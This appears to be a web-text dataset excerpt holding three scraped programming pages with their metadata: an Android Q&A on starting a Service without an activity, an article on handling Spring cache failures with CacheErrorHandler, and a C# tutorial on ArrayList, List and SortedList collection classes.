text
stringlengths
454
608k
url
stringlengths
17
896
dump
stringclasses
91 values
source
stringclasses
1 value
word_count
int64
101
114k
flesch_reading_ease
float64
50
104
Good Morning. I have a question about how to create an application without GUI. It should start when the user pushes the icon. Reading other posts, seems that the natural way of doing this would be a Service. Since the app has no GUI, it makes no sense to add any Activity. For this reason, the Service has to be unbinded. So, if there is no component calling startService, and no external component is sending an intent, ¿how does the service start? Is there any attribute in the manifest to achieve this? Or maybe extending Application and using onCreate to start the service? Thanks. UPDATES: -There's no way to start a Service in the same app without an Intent. Other options would be autostart or Broadcast receivers, but these don't fit my requirements. -Tried a test app without Activities, and the icon isn't even showing in the launcher. Don't know the reason of this, maybe related to the manifest not having a LAUNCHER activity. The list of applications shown in the Android launcher is basically the list of all activities in the system that have a LAUNCHER intent filter: <intent-filter> <action android: <category android: </intent-filter> If you put this intent filter on a <service>, it will not work (just tried). Thus, the only way to do what you want to do is through an Activity. I think the cleanest way is something like this: public void onCreate(Bundle savedInstanceState) { Intent service = new Intent(this, MyService.class); startService(service); Toast.makeText(this, "Service started.", Toast.LENGTH_SHORT).show(); finish(); } The user will not see anything except a small message at the bottom of the screen saying "Service started." that will automatically disappear in a couple of seconds. It's clean and user-friendly. The service is started either when somebody calls startService() or when somebody calls bindService(). Note that if service is only started via bindService() it will be automatically stopped when Activity either explicitly unbinds from it or is destroyed (and it was the only binder). You can declare BOOT_COMPLETED_ACTION broadcast receiver in your AndroidManifest.xml and start your service on system boot. But you service will only start on next device reboot. And there are some issues with applications without activities and this broadcast event in Android 3.1. More info can be found here. In general, its good to have at least one activity in your application, even if your primary component is service. This activity will start the service when user launches it, and also may expose some ability to configure the service behavior. Example of activity that starts service: public class ServiceStarterActivity extends Activity { @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); startService(new Intent(this, ServiceA.class)); finish(); } }
http://www.dlxedu.com/askdetail/3/3a348b27764c56030c016c34e3cba579.html
CC-MAIN-2019-04
refinedweb
459
57.27
Safeguarding Spring (Boot) App From Cache Failure Safeguarding Spring (Boot) App From Cache Failure Ever tried to start up a Spring Boot app only for a busted cache to stop it in its tracks? Cache abstraction and error handling might be a way to keep things smooth.. In a scenario where the application is up but the cache you are connected to fails, how do you continue to function without an outage? And how do you continue to use the cache once it is brought up without any interruptions? There are multiple solutions for this problem, but we will go through how to short circuit the cache in the Spring environment. Use case: A Spring application is up, but the Cache goes down. Spring Cache framework provides an interceptor for cache errors, org.springframework.cache.interceptor.CacheErrorHandler, for the application to take action upon. We will go through this setup in a Spring Boot application, where the application class has to implement org.springframework.cache.annotation.CachingConfigurer, and it can override the errorHandler method. @Configuration @EnableCaching public class SampleApplication extends SpringBootServletInitializer implements CachingConfigurer { @Override public CacheErrorHandler errorHandler() { return CustomCacheErrorHandler(); } } With CustomCacheErrorHandler, you can provide what needs to be done in case there's an error with your cache. This CustomCacheErrorHandler implements the org.springframework.cache.interceptor.CacheErrorHandler , which provides a handle for error conditions while doing Get, Put, Evict, and Clear operations with the cache provider. By overriding these methods, you can provide the means for what needs to be done in these scenarios. public class CustomCacheErrorHandler implements CacheErrorHandler{ @Override public void handleCacheGetError(RuntimeException exception, Cache cache, Object key) { //Do something on Get Error in cache } @Override public void handleCachePutError(RuntimeException exception, Cache cache, Object key, Object value) { //Do something on Put error in cache } @Override public void handleCacheEvictError(RuntimeException exception, Cache cache, Object key) { //Do something on error while Evict cache } @Override public void handleCacheClearError(RuntimeException exception,Cache cache){ //Do something on error while clearing cache } } Let's review how the application would be unaffected if the cache goes down. When the following method is invoked, Spring will try to use the CacheManager to get the cache entry, which will fail because the cache is down. The CacheErrorHandler will intercept this error, and one of the handleCache****Errors would be invoked. If you don't take any action in these methods, then the application will go ahead and serve the request without failing or throwing an exception. @Cacheable("default", key="#search.keyword) public Record getRecordForSearch(Search search) Once the cache is back up, the call to getRecordsForSearch would invoke the CacheManager, which would work this time. Data is fetched from the cache or backend store (and stored in the cache if it is not present already). This way, the application functions seamlessly even if the cache stops functioning itself. This strategy works well for the use case where a Spring application is up but the cache goes down. In case a cache is down during app startup, Spring won't be able to create a CacheManager object and would not start. You can intercept this error and make use of org.springframework.cache.support.NoOpCacheManager, which will bypass the cache and let the application to be brought up (not a recommended way, though) or try an alternate cache manager setup on a different server. Please leave your comments if you are using a cache and how you are handling these failure scenarios. Opinions expressed by DZone contributors are their own. {{ parent.title || parent.header.title}} {{ parent.tldr }} {{ parent.linkDescription }}{{ parent.urlSource.name }}
https://dzone.com/articles/safeguard-spring-app-from-cache-failure
CC-MAIN-2019-43
refinedweb
593
50.57
I would like a python3 program to set the timezone according to the web ip. I am able to get the time zone location and change the time zone in python3 when I leave it returns to UTC. there are a couple different try's in there. Code: Select all import requests from urllib.request import urlopen import re import os os.system('date') #Mon 24 Apr 11:18:03 PDT 2017 #Mon 24 Apr 12:18:04 MDT 2017 #url = '' def OutSideIP(url = ''): request = urlopen(url).read().decode('utf-8') MyIP = re.findall("\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", request) #MyIP = str(MyIP) MyIP = str(MyIP[0]) return MyIP def IPLocation(ip): global js url = ''+ip r = requests.get(url) js = r.json() try: ip = OutSideIP('')#my local modem address pass except OSError: ip = OutSideIP() pass try: IPLocation(ip) pass except: pass TimeZoneNew = js['time_zone'] os.system('export TZ=%s' % TimeZoneNew) #os.environ['TZ'] = js['time_zone'] #os.environ.update() js['country_code'] js['country_name'] js['time_zone'] os.system('date') exit() they all work while python3 is working. I would like to run this at the beginning and have it look up the location and change the TZ according. I have tried under "sudo python3" also.
https://www.raspberrypi.org/forums/viewtopic.php?f=32&t=181461
CC-MAIN-2019-35
refinedweb
211
61.22
Editor's Note - In this article you'll learn how to create a responsive UI that can search and display results using Web Services and Flash Remoting. Jason will show you how to build the interface and manipulate the XML Web Service. This tutorial requires Flash MX, Flash Remoting, and a free Amazon.com associate account. As a webmaster, I frequently find myself forcing third party web tools to integrate into my Web site. In the end, I may disguise the obvious subdomain name or that slight change in the consistency of my design, but I shouldn't have to. I should request and get seamless integration from any vendor into my Web site. Well, several companies are finally coming around with XML Web Services. XML Web Services allow you to hook into a company's infrastructure and share data through the Web. This differs from other methods because it embraces W3C's standards for transportation and descriptions known as SOAP and WSDL. Now companies can embrace this as a way to aggregate real time information. Imagine purchasing financial software off the shelf and seamlessly getting credit card balances and bank statements from different companies. Imagine having full control of that affiliate solution's look and feel. The power of XML Web Services doesn't stop there. It also allows companies to decrease paper and time by instantly transmitting data. For example, Monster.com, HotJobs.com, and CareerBuilder.com could all receive new job posting for your company via an exposed XML Web Service. This allows your Human Resources department to use one tool for writing and sending job posting that works with several job boards as well as brick and motor placement firms. Macromedia understands this vision and plans to be part of it with Flash Remoting. Flash Remoting leaps years ahead of previous ways Flash grabbed data (remember loadVariable) and allows Flash to integrate with any complex Web application exposed as a XML Web Services, as well as ColdFusion MX, ASP.Net, and J2EE. Now Flash can consume Web Services from any remote source and spit out that data as if it where its own. Think about this for a second. You can connect to an Amazon.com XML Web Service and create your own Flash store complete with Amazon recommendations, search, product description...the whole nine yards. Or you could create a responsive UI that can search and display results using Google.com's XML Web Service. And that's exactly what we're going to do in this article. Amazon.com recently released a XML Web Service to allow affiliates to better integrate Amazon.com into their Web sites. This provides amazing potential for Amazon.com, as well as affiliates looking to pass Amazon.com's books off as their own. In this tutorial I'll break down Amazon.com's XML Web Service, show you how to establish a connection with Flash Remoting, and help you build a Flash spotlight that dynamically list Amazon.com's books. To follow along with this tutorial, you should download my Flash file and download Amazon's developer kit. You'll also need to register with Amazon for a unique token. Without this token you cannot connect to the XML Web Service. Now that we understand some of the benefits of XML Web Services, let's take a look at Amazon.com's WSDL. A WSDL (Web Service Description Language) is a XML vocabulary, and we'll use to provide all the information we'll ever need to know about a XML Web Service. With this we can view the Web Service's functions, its location, and special types. Go to to view the WSDL description. <xsd:complexType <xsd:all> <xsd:element <xsd:element <xsd:element <xsd:element <xsd:element <xsd:element <xsd:element </xsd:all> </xsd:complexType> At first this WSDL may look a little intimidating, but it's surprisingly simple and easy to understand. First, look at the <xsd:complexType> tag. This tag allows Amazon to create new types that provide additional functionality or grouping native types like strings and integers can't provide. In the this case, we have an object that stores keyword search criteria. Each type within this object is a string type. In the above code snippet, the elements wrap to the following keyword data: keyword- the keyword used in the search. page- Which page of the search results you'd like to see. mode- The store this search should include. A list of valid stores is available in the developer kit. tag- "webservice-20" this denotes that this is a web service call. type- "lite" or "heavy" response. This corresponds with the amount of data you want returned. devtag- Your unique token. A free token is available at Amazon's web site here. version- Currently "1.0" I will not breakdown the other object defined types but the request wrapper objects are defined in the sample Flash download. <message name="KeywordSearchRequest"> <part name="KeywordSearchRequest" type="typens:KeywordRequest" /> </message> <message name="KeywordSearchResponse"> <part name="return" type="typens:ProductInfo" /> </message> Another important element in the WSDL is the <message> tag; it provides information on the functions available from our Web Service. In the above code snippet, the <part> element represents the parameters for the function named KeywordSearchRequest and the type this parameter is. You should also notice that we have two separate <message> elements, one named KeywordSearchRequest and the other KeywordSearchResponse. Request should be used when calling the function while response provides the type returned. By combining our <message> and <xsd:complexType> elements, we can understand the parameters the function requires. The next section will shed light on how to implement these objects in Flash. Now it's time to open Flash MX and build the framework for our application. For this application to properly run, you need to install Flash Remoting on your Web server. A 30-day trial version of Flash Remoting is available for download from Macromedia. In Flash MX, create a new Flash File and open the action's dialog for frame 1. In this frame we will use Flash Remoting to create a connection to Amazon.com's XML Web Service. #include "NetServices.as" init( init== null ) { var init = true; NetServices.setDefaultGatewayURL( "" ); gatewayConnection = NetServices.createGatewayConnection(); AmazonWebService = gatewayConnection.getService( "", this ); } I've created a code block that initializes my XML Web Service. The first line of the code snippet grabs additional functions and objects included with Flash Remoting from an external action script file. Within the code block we need to define the location of our server using the gateway and instance of the XML Web Service. My application uses the WSDL address we discussed earlier to access Amazon.com's XML Web Service, this allows Flash Remoting to programmatically build a proxy, or interrupter, to our XML Web Service. This code snippet is for a ASP.Net server; a JRun or Coldfusion server will not require .aspx on the gateway call. Also, ASP.Net requires a physical file in the path; JRun and Coldfusion don't. With a connection to our XML Web Service established, let's build a interface to display the output. Using the text tool, create two text boxes on the main movie clip. Name the first text box txtName and the second txtPrice. Next, create an empty movie clip named mcImage and place it on your main movie clip. Please note that our mcImage movie clip will work as a holder for our product's image. Because the size of the image varies based on the type of product, it's a good idea to add a backdrop for your movie clip. For more information on dynamically loading images view my article on jasonmperry.com. With our base elements in place you may want to add a little spice to your Amazon.com product spotlight. I've taken the liberty of adding a bright spinning background to draw attention to the spotlighted book and setting my text colors to white. Interface in hand, lets focus on filling those text boxes with dynamic content. To do this we need to implement a callback function and object that wraps to our XML Web Service's <message> and <xsd:complexType> definitions. function AsinSearchRequest_Result( result ) { ProductInfo = result; //sets the product info for our moviec lip txtProductName.text = ProductInfo.Details[ 0 ].ProductName; txtProductPrice.text = ProductInfo.Details[ 0 ].OurPrice; urlProductLocation = ProductInfo.Details[ 0 ].Url; //loads the medium sized image onto the _root. //Image holder provides size holder. loadMovie( ProductInfo.Details[ 0 ].ImageUrlMedium, _root.mcImage ); } function AsinSearchRequest_Status( error ) { trace( error.code ); trace( error.description ); trace( error.details ); } Callback functions receive response data and errors sent from our XML Web Service proxy. These callbacks wrap to the AsinSearchRequest function defined in the WSDL. The " _Result" function is called with the output of AsinSearchResponse, and " _Status" is called if an error occurs during the call. When implementing a callback function take the name of the method and add both " _Result" and " _Status" to the end. In our " _Result" callback we receive an instance of the ProductInfo type defined in our WSDL. Our code snippet grabs the returned product's name, price, URL, and image from the result. We also need to use loadMovie to dynamically grab the URL of our product's image and display it in our Flash Application. To provide better positioning of the image you should use load the jpeg into a movie clip. //creates a AsinRequest object type wrapper asinRequest = function(asin, mode) { this.asin = asin; this.mode = mode; this.tag = "webservices-20"; //tag this.token = "???"; //Your unique token this.version = "1.0"; //id of this version of Amazon service. Currently 1.0. this.type = "heavy"; //"heavy" or "lite" determines amount of copy returned } Object.registerClass( "AsinRequest", asinRequest ); The next step is to create a object wrapper for our parameter type. To do this we can create mirror image of our AsinRequest WSDL complex type as a Flash object. We also need to register the new class as type AsinRequest. AmazonWebService.AsinSearchRequest( new AsinRequest( "0672320789", "books") ); With our callbacks done and AsinRequest object registered, we can call the AsinSearchRequest method and sent our AsinRequest parameter to the XML Web Service. When Flash Remoting receives data as ether a error message or result it will call the proper callback function. NOTE: When in debug mode you can view the result data to see the best way to access the data. In the sample download I've taken the liberty of implementing the remaining callback functions and wrappers. This should give you a good idea of how to implement any object in Flash based on its WSDL counterpart. Using Flash Remoting to create a dynamic interface to Amazon.com's XML Web Services only brushes on the capabilities of Flash Remoting. The true potential lies in developing Flash interfaces that mimic Windows UI components and are responsive. In the near future, complex applications like credit card accounts will allow you to drag and drop a payment onto the proper icon or display a progress bar as it grabs last month's statement. The FLA source file built in this tutorial is available for download as FlashAmazonSpotlight.zip. Note the file will not work with out Flash Remoting installed and running on your computer. A 30-day trial version of Flash Remoting is available for download at Macromedia.com. Jason Michael Perry is a partner in Out the Box Web Productions and the Webmaster for Pan-American Life, an international financial services company. You can contact Jason by visiting Jasonmperry.com. Return to the Web Development DevCenter.
http://archive.oreilly.com/lpt/a/3092
CC-MAIN-2015-18
refinedweb
1,934
57.98
TypeName AvoidNamespacesWithFewTypes CheckId CA1020 Category Microsoft.Design Breaking Change Breaking A namespace other than the global namespace contains fewer than five types. Make sure that there is a logical organization to each of your namespaces, and that there is a valid reason for putting to be used in the same application, and are therefore located in separate namespaces. Careful namespace organization can also be helpful because it increases the discoverability of a feature. By examining the namespace hierarchy, library consumers should be able to locate the types that implement a feature. Design-time types and permissions should not be merged into other namespaces to comply with this guideline. These types belong in their own namespaces below your main namespace, and the namespaces should end in .Design and .Permissions, respectively. To fix a violation of this rule, try to combine namespaces that contain a small number of types into a single namespace. It is safe to suppress a warning from this rule when the namespace does not contain types that are used with the types in your other namespaces.
http://msdn.microsoft.com/en-us/library/ms182130.aspx
crawl-002
refinedweb
178
51.58
Deploy an JCo / RFC based on-premise extension using the Cloud Connector 01/09/2019 You will learn - How to deploy an on-premise extension which uses RFC via JCo, which includes the setup of a Cloud Connector instance The scenario used in this tutorial is based on the well-known SFLIGHT model available as default sample content in all ABAP systems. It is assumed that you are using the SAP Cloud Appliance Library to get an ABAP test system plus pre-installed Cloud Connector, as described in the tutorial Setup SAP Cloud Appliance Library account and install preconfigured SAP solution in cloud. The overall landscape of this on-premise extension scenario is then looking like in the figure below: The components are explained in greater detail at the end of this tutorial. On Windows, press the Windows-Key and R. This should open the Run-Dialog. Type in mstsc.exeand hit Enter. Logon to your AWS instance with user Administratorand the master password you have specified when configuring the AWS instance in the SAP Cloud Appliance Library. You should then have access to the Windows instance related to the AWS instance. On the desktop, you find shortcuts for SAP Development Tools for Eclipse and Mozilla Firefox. Download the compiled version of the sample project. If you want to take a look at the code clone our Git repository or explore it directly online using the GitHub webpage: Open the cloud cockpit and logon with your SAP Cloud Platform user. Navigate to Applications > Java Applications and select Deploy Application. A Dialog will open. Select the warfile you just downloaded and choose a name for the application. Now click on Deploy. It is recommended to use sflightas application name, but it’s up to you. The application is now deployed to your SAP Cloud Platform account. This will take some time. Now you need to configure the destination used by the application to access the ABAP system. Go to D:/sap_hcp_scc/using the Windows Explorer and rename file dest_sflight.jcoDestinationto dest_sflight. Open the SAP Cloud Platform cloud cockpit in the browser and log on to your SAP Cloud Platform account. Navigate into Java Applications and select the application you just deployed then navigate into Destinations. Click on the Import Destination button and select the file D:/sap_hcp_scc/dest_sflight Now you will connect the Cloud Connector to your free developer account and configure the ABAP system and BAPIs used by the sflight application. Start the Cloud Connector administration UI using the Firefox browser provided on the desktop of the AWS instance with URL, and logon with user Administratorand password as manage. Later it asks you to change the password To connect the Cloud Connector to your account, follow step one described in the tutorial Connect an ABAP System with SAP Cloud Platform Using a Secure Tunnel (Neo). Shortly summarized, you need to choose the following parameters: Now the Cloud Connector should be connected to your SAP Cloud Platform account and you should see a screen similar to the one in the screenshot below. Navigate to the Access Control view of the Cloud Connector and click the Import… button. In the upcoming window, click the Browse button and select the file D:/sap_hcp_scc/access_control.zipand click Save. Now you have imported the configuration of the ABAP system and the RFC resources needed by the SFLIGHTapplication and your Cloud Connector should look like shown below. Now the SFLIGHT application has been deployed to your SAP Cloud Platform account, the needed destination has been configured, and the Cloud Connector has been connected and configured as well. The application can now be used. Test it by starting it in the browser: Open the cloud cockpit and log on again with your SAP Cloud Platform user. Navigate into Java Applications and drill into your application. Start the SFLIGHTapplication by clicking the URL visible under Application URLs. This should bring up the application. You can now select a flight departure and arrival airport, e.g. Frankfurtand New York, then click the Search button. This should then list the available flights. The SFLIGHT application uses SAPUI5 as the UI technology. In line with the Model-View-Controller paradigm, the main components comprising the UI layer are two JavaScript files sflight.view.js and sflight.controller.js, which are located in the /src/main/webapp/sflight-web folder of the project. The screenshot below shows the UI with the function names of the sflight.view.js file, which implement the respective panel: ui_java_script The individual panels interact with the sflight.controller.js file in following ways: createFlightSearchPanel(...): calls the searchFlights(...)function of the controller to retrieve a list of flights from specified departure and arrival airports. createFlightListPanel(...): calls the getFlightDetails(...)function of the controller to retrieve the details of the selected flight. createFlightDetailsPanel(...): calls the bookFlight(...)function of the controller to book the selected flight. It also calls the searchFlights(...)function of the controller again to retrieve an updated flight list. The UI controller interacts with the server using REST services. All REST services return a JSON response. Consequently, both the controller and view components are using the sap.ui.model.json.JSONModel to bind the UI to the JSON data. The REST services called in the sflight.controller.js file are the following: - GET /rest/v1/flight.svc/cities: Returns a JSON array of cities, in which airports are located. - GET: /rest/v1/flight.svc/flights/{cityFrom}/{cityTo}: Returns a JSON array of flights with departure airport {cityFrom}and arrival airport {cityTo}. - GET: /rest/v1/flight.svc/flight/{carrier}/{connNumber}/{dateOfFlight}: Returns a JSON array with the details of the specified flight. /rest/v1/flight.svc/booking: Books a flight as specified in the response body and returns a JSON object with the booking ID. (The xmlhttprequestobject is used directly to trigger the POST request to the server.) The application is using Apache CXF and the Spring Framework to provide the necessary REST services. In order to use these libraries, the needed dependencies must be defined in the pom.xml: <!--> How to use CXF in combination with Spring is described in more detail on the Apache Website. In short, these two libraries combined provide a simple-to-use framework to define REST services in POJOs, taking care for all the boilerplate code of receiving and sending HTTP requests for you. It thus allows you to focus on the business logic and makes development of REST services easy as 1-2-3. To understand how the REST services of the sample application are implemented, you need to look into the springrest-context.xml file located under the /src/main/webapp/WEB-INF folder of the project. There, a Spring bean is defined with the name flightService. This bean is implemented by the Java class com.sap.cloudlabs.connectivity.sflight.FlightService. Using CXF and Spring annotations, the FlightService class is a simple POJO which provides the GET and POST service endpoints listed above. A small code fragment that shows how the definition of the REST service is done is shown here: @Service("flightService") @Path("/flight.svc") @Produces({ "application/json" }) public class FlightService { @GET @Path("/flights/{cityFrom}/{cityTo}") @Produces("application/json") public String getFlightList(@Context HttpServletRequest req, @PathParam("cityFrom") String cityFrom, @PathParam("cityTo") String cityTo) { // ... } } The FlightService class delegates all calls to a FlightProvider object which then, in turn, does the actual call to the on-premise system. For this, an interface com.sap.cloudlabs.connectivity.sflight.FlightProvider is used that defines the Java methods which shall be performed against the on-premise system. Right now, there is only one implementation of the FlightProvider interface: com.sap.cloudlabs.connectivity.sflight.jco.JCoFlightProvider. The JCoFlightProvider class uses the Java Connector (JCo) API to make RFC calls directly against the ABAP system. Of course, all the communication is encrypted and secured via the Cloud Connector. You can use JCo in exactly the same way as you might know it from SAP NetWeaver Application Server Java. A tutorial how to work with JCo can be found in the SAP Business Objects Documentation. The JCoFlightProvider class requires an RFC destination called dest_sflight. Note that the JCoFlightProvider class not only fetches data from the ABAP system, but also writes back a flight booking transaction to the ABAP system. The BAPIs called by the application on the ABAP system are: BAPI_SFLIGHT_GETLIST BAPI_SFLIGHT_GETDETAIL BAPI_SBOOK_CREATEFROMDATA BAPI_TRANSACTION_COMMIT Related Information - Step 1: Log on to the AWS instance - Step 2: Deploying and running the sample project - Step 3: Configuring the connectivity destination in the cloud - Step 4: Configuring the Cloud Connector - Step 5: Testing the application - Step 6: Explaining the UI layer - Step 7: Explaining the REST services - Step 8: Explaining the connectivity layer - Back to Top
https://developers.sap.com/tutorials/hcp-scc-onpremise-extension-jco-rfc.html
CC-MAIN-2019-26
refinedweb
1,455
56.15
Description This class is part online/part classroom. You must complete the 2 hours of online learning and bring that certificate to class to take the hands on portion. See link for online Blended Learning below: If you need to see other dates for our public classes, feel free to stop by our calendar at: The average response time for an Ambulance is 8-10 minutes. The time it takes the brain to die is 6 minutes. Every second counts and CPR makes it count! Class length 2hrs Online & 3hrs of Hands-on in the Classroom. Covering CPR, Choking, AED and Pediatric-Adult First Aid. 90% is hands-on course time, no boring lectures here! PLEASE NOTE THIS COURSE IS BLENDED LEARNING (Part online before class 2hrs , and a lot of great hands-on practice in class) This way we save a lot of time in class, and allow you to do the online learning on your timing, as long as it's done BEFORE class. Access is FREE! Once you click the link use your email to sign-up then proceed with the modules at your own pace." Use the same email you want your certification sent to after our in-person class. Happy E-Learning! By Red Cross standards, YOU MUST bring a copy of the certificate you receive for completing blended learning to show the instructor at class (either on your smartphone or a hard copy). If you don't have that with you, we will need to reschedule you to another class. Rescheduling is only allowed once.. For more information you can email our customer support at clientcare@happyswimmers.com California Customer Support 1 (818)530-4117 USA Support 1 (866)530-4117 See what people are saying about us on YELP!
https://www.eventbrite.com/e/santa-cruz-a-red-cross-adult-pediatric-cpr-aed-and-first-aid-class-tickets-67922476957?aff=ebdssbdestsearch
CC-MAIN-2019-39
refinedweb
296
71.75
NAME VOP_OPEN, VOP_CLOSE - open or close a file SYNOPSIS #include <sys/param.h> #include <sys/vnode.h> int VOP_OPEN(struct vnode *vp, int mode, struct ucred *cred, struct thread *td, struct file *f. fp The file being opened. Pointer to the file fp is useful for file systems which require such information, e.g., fdescfs(5). Use ‘NULL’ as fp argument to VOP_OPEN() for in-kernel opens.. RETURN VALUES Zero is returned on success, otherwise an error code is returned. PSEUDOCODE int vop_open(struct vnode *vp, int mode, struct ucred *cred, struct thread *td, struct file *fp) { /* * Most file systems don’t do much here. */ return 0; } SEE ALSO vnode(9), VOP_LOOKUP(9) AUTHORS This manual page was written by Doug Rabson.
http://manpages.ubuntu.com/manpages/karmic/man9/VOP_OPENCLOSE.9freebsd.html
CC-MAIN-2013-20
refinedweb
122
76.01
In order to prevent your customers' personal data (US: PII) being stored in our cloud infrastructure, we require use of unique, non-guessable and immutable contact identifiers, instead of easily guessable identifiers like email addresses or phone numbers. Using PII data as the primary contact identifier for mobile devices is not supported. If the user name is insecure (for example, if it is visible to other users, or other users could guess it), then it represents a security risk, as anyone could impersonate that user and receive personalized messages not meant for them. We recommend that you use a new custom field containing both the hash of that username and a secret. This custom field should be generated on your server side. You can use any immutable, non-sequential, non-guessable unique identifier. If you have one already used to uniquely identify customers internally, you could use that. Or if you want to use email, then you can take the email, add a long string (secret) that lives solely in your server, and then use a hash function against that email, the secret long string that only you know. You would need to create a new suite field in our field editor that includes a string value. You would need to import the hashed values of your clients into our DB; that will then serve as the unique identifier. You do not need to store this hashed value in your back end, because when a user logs in with their password, they can use their email+secret at that time to create the hashed value, and then use that in the SDK login call to Mobile Engage's backend. For performance purposes, we recommend you store this hash instead of calculating it on every login, but this remains an optional implementation for performance optimization. Thanks to the universality of SHA-1, we can provide the following specific sample codes: PHP <?php function nonGuessableUniqueID($guessableUniqueID, $salt) { return hash('sha1', $guessableUniqueID. $salt); } ?> Ruby require 'digest' def nonGuessableUniqueID(guessableUniqueID, salt) Digest::SHA1.hexdigest(guessableUniqueID + salt) end Python import hashlib def nonGuessableUniqueID(guessableUniqueID, salt): return hashlib.sha1(guessableUniqueID + salt).hexdigest(); Node.js var crypto = require('crypto'); function nonGuessableUniqueID(guessableUniqueID, salt) { var sum = crypto.createHash('sha1'); sum.update(email + salt); return sum.digest('hex'); } ];
https://help.emarsys.com/hc/es/articles/360004418234-Mobile-Engage-Contact-Authentication-from-Mobile-Devices
CC-MAIN-2018-34
refinedweb
379
51.48
What can produce a relational table out of XML data or a sequence of XML fragments? What can be used to shred (or since the Enron scandal "decompose") data simply by using SQL when ingesting data into a warehouse? What can serve relational applications while managing XML data? Of course I am talking about the XMLTABLE function that is part of the SQL standard and the DB2 pureXML feature. I plan to post a couple of entries about this very versatile function, hence the "Part 1" in the title. Today, I start with a focus on the syntax for typical usage scenarios. At first sight the XMLTABLE syntax looks mostly straight-forward: XMLTABLE "(" [namespace declaration ","] row-definition-XQuery [passing-clause] [COLUMNS column-definitions] ")" Basically, you could first optionally declare some global namespaces (more later), then comes an XQuery expression similar to those in XMLQUERY and XMLEXISTS to define the row context, then the optional, but familiar PASSING clause and finally the COLUMN definitions similar to a CREATE TABLE statement. There are usually different ways of writing a (X)query. For the XMLTABLE function, the XQuery clause needs some consideration because it defines the row context, i.e., what part of the XML document is available (and is iterated over) for the column values when each row of the resultset is produced. In some examples in future parts I will show the impact of the XQuery expressions. The PASSING clause is optional because you could work with constants in your XQuery (not very likely) or use column names to reference the data (e.g., "$DOC" for the DOC column). In many cases you will want to use the PASSING clause to utilize parameter markers, e.g., when directly ingesting application data. The (optional) column definition is similar to a simple CREATE TABLE statement. You specify the column name and its type (e.g., NAME VARCHAR(20)). After the type comes the most interesting part, the keyword "PATH" followed by a string literal that is interpreted as XQuery expression. Within that XQuery the context (".") refers to that set in the row context (see above). If you would iterate over employees in a department, you could then simply refer to the employees' first- and lastname like shown: SELECT t.* FROM dept, XMLTABLE('$DEPT/dept/emp' COLUMNS first VARCHAR(20) PATH './first', last VARCHAR(20) PATH './last') as t Note that for columns all types are supported which are supported by XMLCAST. The reason is that behind the covers XMLCAST is called to map the value identified by the column-related XQuery to the relational column value. Earlier I mentioned that global namespaces could be declared. Imagine that the department documents all have a default namespace "foo" (e.g., "<dept xmlns="foo"><emp>..."). In order to properly navigate within the documents your query would need to look like shown: select x.* from dep,xmltable('declare default element namespace "foo";$DOC/dept/emp' COLUMNS first VARCHAR(20) PATH 'declare default element namespace "foo";./first', last VARCHAR(20) PATH 'declare default element namespace "foo";./last') as x All the different XQueries would need to declare the namespace "foo". To make our lifes simpler, the SQL standard allows to globally declare the namespace using the XMLNAMESPACES function (which usually is used for publishing purposes): select x.* from dep,xmltable(XMLNAMESPACES(default 'foo'),'$DOC/dept/emp' COLUMNS first VARCHAR(20) PATH './first', last VARCHAR(20) PATH './last') as x The namespace is declared only once, the statement looks much cleaner and is simpler to write. That's it for today as an introduction. Please let me know if you have questions on XMLTABLE that you would like to have answered in a future post.
http://blog.4loeser.net/2009/09/xmltable-all-in-one-function-part-1.html
CC-MAIN-2017-13
refinedweb
616
64.1
Collection classes are used for data storage and manipulate (sort, insert, remove etc) the data. Most of the collection classes implement the same interfaces, and these interfaces may be inherited to create new collection classes on the basis of more specialized data. These collection classes are defined in System.Collections.Generic. Main collection classes which are used in c# as · ArrayList Class · HashTable Class · Stack Class and Queue class etc. The main properties of the collection classes are · Collection classes are defined as part of the System.Collection or System.Collections.Generic namespace. · Most collection classes derive from the interfaces ICollection, IComparer, IEnumerable, IList, IDictionary, and IDictionaryEnumerator and their generic equivalents. · Using generic collection classes provides increased type-safety and in some cases can provide better performance, especially when storing value types. The following generic types correspond to existing collection types: · List is the generic class corresponding to ArrayList. · Dictionary is the generic class corresponding to Hashtable. · Collection is the generic class corresponding to collectionBase.Collection can be used as a base class, but unlike CollectionBase it is not abstract, making it much easier to use. · ReadOnlyCollection is the generic class corresponding to ReadonlyCollection. ReadOnlyCollection is not abstract, and has a constructor that makes it easy to expose an existing List as a read-only collection. · The Queue, stack and SortedList generic classes correspond to the respective nongeneric classes with the same names. List Generic Class or ArrayList The List class is the generic equivalent of the ArrayList class. It implements the IList generic interface using an array whose size is dynamically increased as required. ArrayList is the part of datastructure.it show the simple list value. ArrayList class contain the Add, Insert Remove, RemoveAt and Sort method and main properties like Capacity, Count etc. It is the part of System.Collection. Syntax for creating a ArrayList: ArrayList name = new ArrayList(); Syntax for creating a List<T>: List<Type> name=new List<Type>(); There are some basic properties and methods of List<T> 1. Adding item to list 2. Removing item to list 3. Sort the list 4. Insert the item into the list etc. Example: //make object of ArrayList class like countryList ArrayList countryList = new ArrayList(); //Add the country in the countrylist countryList.Add("India"); countryList.Add("SriLanka"); countryList.Add("SouthAfrica"); countryList.Add("Australia"); countryList.Add("England"); //Show the countryList Response.Write("<b><u>Country List:</u></b><br/>"); foreach (string country in countryList) Response.Write(country + "<br/>"); Example: //define the List here List<string> countryList = new List<string>(); //use the add method to add the element in List countryList.Add("Rusea"); countryList.Add("GreenLand"); countryList.Add("India"); countryList.Add("Pakistan"); countryList.Add("US"); //print the data on web page Response.Write("<b><u>Country List:</u></b><br/>"); foreach (string country in countryList) Response.Write(country +"<br/>"); Country List: India SriLanka SouthAfrica Australia England List have following remove properties: Remove(), RemoveAt(), RemoveAll(), RemoveRange(). Example: countryList.Remove("Pakistan"); Insert method is used for Insert item into the List at any index of the list. Example countryList.Insert(2,"Pakistan"); Example: countryList.Sort (); Note: Other method which is used in List<T> IndexOf(),Contains(),TrimExcess(),Clear() etc. The SortedList object contains items in key/value pairs. SortedList objects automatically sort the items in alphabetic or numeric order. Main method of sorted list are Add(), Remove(), IndexOfKey(), IndexOfValue(), GetKeyList(), GetKeyValue() etc. and to object key and values. Example: //make object of Sorted List class like countryTable SortedList countrySList = new SortedList(); //Add the country in the hashtable.Add(Object key,Object value) countrySList.Add(1, "india"); countrySList.Add(2, "England"); //Find the key and value by using DictionaryEntry foreach (DictionaryEntry country in countrySList) Response.Write(country.Key + " : " + country.Value + "<br/>"); Note: Another Example related to SortedList check this link How use the GetKeyList() and GetKeyValue() method Example IList countryKey = countrySList.GetKeyList(); 